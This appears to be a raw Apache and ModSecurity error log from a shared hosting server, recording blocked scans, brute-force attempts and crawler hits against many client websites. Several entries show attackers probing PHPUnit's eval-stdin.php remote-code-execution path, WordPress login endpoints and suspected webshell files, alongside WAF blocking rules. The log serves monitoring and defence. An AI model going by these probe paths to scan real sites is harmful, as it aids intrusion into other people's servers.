[Tue May 26 13:13:30.484050 2026] [security2:error] [pid 496740:tid 496782] [remote 185.177.72.30:44050] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/RSC/ug53yljiqiwb0y5.txt"] [unique_id "ahVPIuvOeft4ltnLrH5GXQAAQik"]
[Tue May 26 13:13:30.799834 2026] [security2:error] [pid 496740:tid 496901] [client 167.71.198.58:52009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVPIuvOeft4ltnLrH5GXwAAAB8"]
[Tue May 26 13:13:30.981378 2026] [security2:error] [pid 496740:tid 496836] [remote 185.177.72.30:44058] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "samayikprasanga.in"] [uri "/RSC/R/72os7a60sifqu7q.txt"] [unique_id "ahVPIuvOeft4ltnLrH5GaAAAZF8"]
[Tue May 26 13:13:31.163853 2026] [security2:error] [pid 496740:tid 496911] [client 34.32.247.234:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "biofresco.it"] [uri "/"] [unique_id "ahVPI-vOeft4ltnLrH5GcAAAACk"]
[Tue May 26 13:13:31.163944 2026] [security2:error] [pid 496740:tid 496911] [client 34.32.247.234:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "biofresco.it"] [uri "/"] [unique_id "ahVPI-vOeft4ltnLrH5GcAAAACk"]
[Tue May 26 13:13:31.311349 2026] [security2:error] [pid 496740:tid 496957] [client 185.177.72.30:9416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVPI-vOeft4ltnLrH5GdAAAAFc"]
[Tue May 26 13:13:31.648286 2026] [security2:error] [pid 496740:tid 496973] [client 185.177.72.30:9432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVPI-vOeft4ltnLrH5GeQAAAGc"]
[Tue May 26 13:13:31.992325 2026] [security2:error] [pid 496740:tid 496967] [client 185.177.72.30:9448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVPI-vOeft4ltnLrH5GjAAAAGE"]
[Tue May 26 13:13:32.354482 2026] [security2:error] [pid 496740:tid 496907] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPI-vOeft4ltnLrH5GhwAAACU"]
[Tue May 26 13:13:32.746457 2026] [security2:error] [pid 496740:tid 496874] [client 185.177.72.30:9450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVPJOvOeft4ltnLrH5GogAAAAQ"]
[Tue May 26 13:13:32.965125 2026] [security2:error] [pid 496740:tid 496978] [client 20.151.111.128:8312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVPJOvOeft4ltnLrH5GpgAAAGw"]
[Tue May 26 13:13:33.071806 2026] [security2:error] [pid 496740:tid 496940] [client 185.177.72.30:9464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVPJevOeft4ltnLrH5GrAAAAEY"]
[Tue May 26 13:13:33.403750 2026] [security2:error] [pid 496740:tid 496876] [client 185.177.72.30:9476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVPJevOeft4ltnLrH5GtQAAAAY"]
[Tue May 26 13:13:34.681599 2026] [security2:error] [pid 496740:tid 496943] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPJuvOeft4ltnLrH5G1AAAAEk"]
[Tue May 26 13:13:35.339017 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.111.128:8287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.vcresco.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVPJ-vOeft4ltnLrH5G-QAAAHc"]
[Tue May 26 13:13:37.364966 2026] [security2:error] [pid 496740:tid 496968] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPKOvOeft4ltnLrH5HJAAAAGI"]
[Tue May 26 13:13:38.174484 2026] [security2:error] [pid 496740:tid 496915] [client 114.119.155.205:54909] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/author/user/"] [unique_id "ahVPKuvOeft4ltnLrH5HQQAAAC0"], referer: https://bhavisharchitects.com/author/user/
[Tue May 26 13:13:39.107898 2026] [security2:error] [pid 496740:tid 496874] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPKuvOeft4ltnLrH5HUwAAAAQ"]
[Tue May 26 13:13:39.398492 2026] [security2:error] [pid 496740:tid 496863] [remote 45.32.67.165:50244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVPK-vOeft4ltnLrH5HYQAAcno"]
[Tue May 26 13:13:41.081731 2026] [security2:error] [pid 496740:tid 496748] [remote 74.7.241.58:40136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVPLevOeft4ltnLrH5HkAAACAc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:13:41.783782 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPLevOeft4ltnLrH5HkwAAAFw"]
[Tue May 26 13:13:44.522804 2026] [security2:error] [pid 496740:tid 496939] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPMOvOeft4ltnLrH5H2wAAAEU"]
[Tue May 26 13:13:47.091283 2026] [security2:error] [pid 496740:tid 496936] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPMuvOeft4ltnLrH5IIQAAAEI"]
[Tue May 26 13:13:47.702441 2026] [autoindex:error] [pid 496740:tid 496923] [client 162.62.213.187:34136] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:13:48.730128 2026] [security2:error] [pid 496740:tid 496758] [remote 167.99.5.1:60126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVPNOvOeft4ltnLrH5IWgAAWBE"]
[Tue May 26 13:13:49.031554 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPNOvOeft4ltnLrH5IZgAAAFw"]
[Tue May 26 13:13:51.793238 2026] [security2:error] [pid 496740:tid 496874] [client 177.7.56.27:32788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahVPN-vOeft4ltnLrH5IngAAAAQ"]
[Tue May 26 13:13:51.819190 2026] [security2:error] [pid 496740:tid 496879] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPN-vOeft4ltnLrH5IogAAAAk"]
[Tue May 26 13:13:52.100207 2026] [security2:error] [pid 496740:tid 496931] [client 177.7.56.27:32788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahVPOOvOeft4ltnLrH5IsgAAAD0"]
[Tue May 26 13:13:52.598879 2026] [security2:error] [pid 496740:tid 496991] [client 67.60.162.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPOOvOeft4ltnLrH5IuQAAAHk"]
[Tue May 26 13:13:54.857475 2026] [security2:error] [pid 496740:tid 496899] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPOuvOeft4ltnLrH5JAgAAAB0"]
[Tue May 26 13:13:56.776954 2026] [security2:error] [pid 496740:tid 496875] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPPOvOeft4ltnLrH5JPAAAAAU"]
[Tue May 26 13:13:57.136275 2026] [security2:error] [pid 496740:tid 496936] [client 216.244.66.241:46440] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/lienomedullaryeaef/bdedce919720.shtml"] [unique_id "ahVPPevOeft4ltnLrH5JVAAAAEI"]
[Tue May 26 13:13:57.136395 2026] [security2:error] [pid 496740:tid 496936] [client 216.244.66.241:46440] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/lienomedullaryeaef/bdedce919720.shtml"] [unique_id "ahVPPevOeft4ltnLrH5JVAAAAEI"]
[Tue May 26 13:13:58.769326 2026] [security2:error] [pid 496740:tid 496909] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPPuvOeft4ltnLrH5JegAAACc"]
[Tue May 26 13:14:01.749875 2026] [security2:error] [pid 496740:tid 496894] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPQevOeft4ltnLrH5J0AAAABg"]
[Tue May 26 13:14:04.031533 2026] [security2:error] [pid 496740:tid 496942] [client 104.232.216.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVPQ-vOeft4ltnLrH5KCQAAAEg"]
[Tue May 26 13:14:04.135450 2026] [security2:error] [pid 496740:tid 496900] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPQ-vOeft4ltnLrH5KRQAAAB4"]
[Tue May 26 13:14:06.578419 2026] [security2:error] [pid 496740:tid 496982] [client 149.56.150.22:53305] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVPRevOeft4ltnLrH5KdwAAAHA"]
[Tue May 26 13:14:06.735217 2026] [security2:error] [pid 496740:tid 496942] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPRuvOeft4ltnLrH5KhgAAAEg"]
[Tue May 26 13:14:07.019809 2026] [proxy:error] [pid 496740:tid 496750] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:07.019870 2026] [proxy_http:error] [pid 496740:tid 496750] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:07.020497 2026] [proxy:error] [pid 496740:tid 496750] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:07.020540 2026] [proxy_http:error] [pid 496740:tid 496750] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:08.966011 2026] [security2:error] [pid 496740:tid 496926] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPSOvOeft4ltnLrH5K2wAAADg"]
[Tue May 26 13:14:09.491256 2026] [proxy:error] [pid 496740:tid 496752] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:09.491355 2026] [proxy_http:error] [pid 496740:tid 496752] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:09.492051 2026] [proxy:error] [pid 496740:tid 496752] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:09.492142 2026] [proxy_http:error] [pid 496740:tid 496752] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:09.763664 2026] [security2:error] [pid 496740:tid 496768] [remote 31.24.44.107:57650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVPSevOeft4ltnLrH5K_gAAKRs"]
[Tue May 26 13:14:10.183778 2026] [security2:error] [pid 496740:tid 496871] [client 185.191.171.12:29592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVPSuvOeft4ltnLrH5LHAAAAAE"]
[Tue May 26 13:14:10.183885 2026] [security2:error] [pid 496740:tid 496871] [client 185.191.171.12:29592] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVPSuvOeft4ltnLrH5LHAAAAAE"]
[Tue May 26 13:14:10.988839 2026] [security2:error] [pid 496740:tid 496883] [client 31.57.184.107:59116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "deepakrohilla.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVPSuvOeft4ltnLrH5LMAAAAA0"], referer: https://duckduckgo.com/
[Tue May 26 13:14:11.322090 2026] [security2:error] [pid 496740:tid 496986] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPSuvOeft4ltnLrH5LMwAAAHQ"]
[Tue May 26 13:14:11.781833 2026] [proxy:error] [pid 496740:tid 496825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:11.781894 2026] [proxy_http:error] [pid 496740:tid 496825] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:11.782886 2026] [proxy:error] [pid 496740:tid 496825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:11.783207 2026] [proxy_http:error] [pid 496740:tid 496825] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:13.351687 2026] [security2:error] [pid 496740:tid 496906] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPTOvOeft4ltnLrH5LegAAACQ"]
[Tue May 26 13:14:13.555659 2026] [proxy:error] [pid 496740:tid 496852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:13.555739 2026] [proxy_http:error] [pid 496740:tid 496852] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:13.556651 2026] [proxy:error] [pid 496740:tid 496852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:13.556712 2026] [proxy_http:error] [pid 496740:tid 496852] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:15.010914 2026] [http2:info] [pid 501489:tid 501489] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:14:16.365939 2026] [security2:error] [pid 501489:tid 501690] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPT2kFNZ9cRlz80Ii4HwAAAMs"]
[Tue May 26 13:14:18.819237 2026] [security2:error] [pid 501489:tid 501721] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPUmkFNZ9cRlz80Ii4bgAAAOo"]
[Tue May 26 13:14:19.398569 2026] [proxy:error] [pid 501489:tid 501594] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:19.398658 2026] [proxy_http:error] [pid 501489:tid 501594] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:19.399345 2026] [proxy:error] [pid 501489:tid 501594] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:19.399383 2026] [proxy_http:error] [pid 501489:tid 501594] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:20.427948 2026] [security2:error] [pid 501489:tid 501667] [client 72.56.190.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPVGkFNZ9cRlz80Ii4qQAAALQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:14:20.765851 2026] [security2:error] [pid 501489:tid 501638] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPVGkFNZ9cRlz80Ii4qAAAAJg"]
[Tue May 26 13:14:21.455699 2026] [security2:error] [pid 501489:tid 501655] [client 72.56.190.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVPVWkFNZ9cRlz80Ii4yAAAAKg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430773&moderation-hash=60799b566281c744d81ee001c1862c62
[Tue May 26 13:14:21.869408 2026] [proxy:error] [pid 501489:tid 501610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:21.869459 2026] [proxy_http:error] [pid 501489:tid 501610] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:21.870077 2026] [proxy:error] [pid 501489:tid 501610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:14:21.870110 2026] [proxy_http:error] [pid 501489:tid 501610] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:14:22.204737 2026] [security2:error] [pid 501489:tid 501694] [client 196.244.71.212:37276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVPVWkFNZ9cRlz80Ii40gAAAM8"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
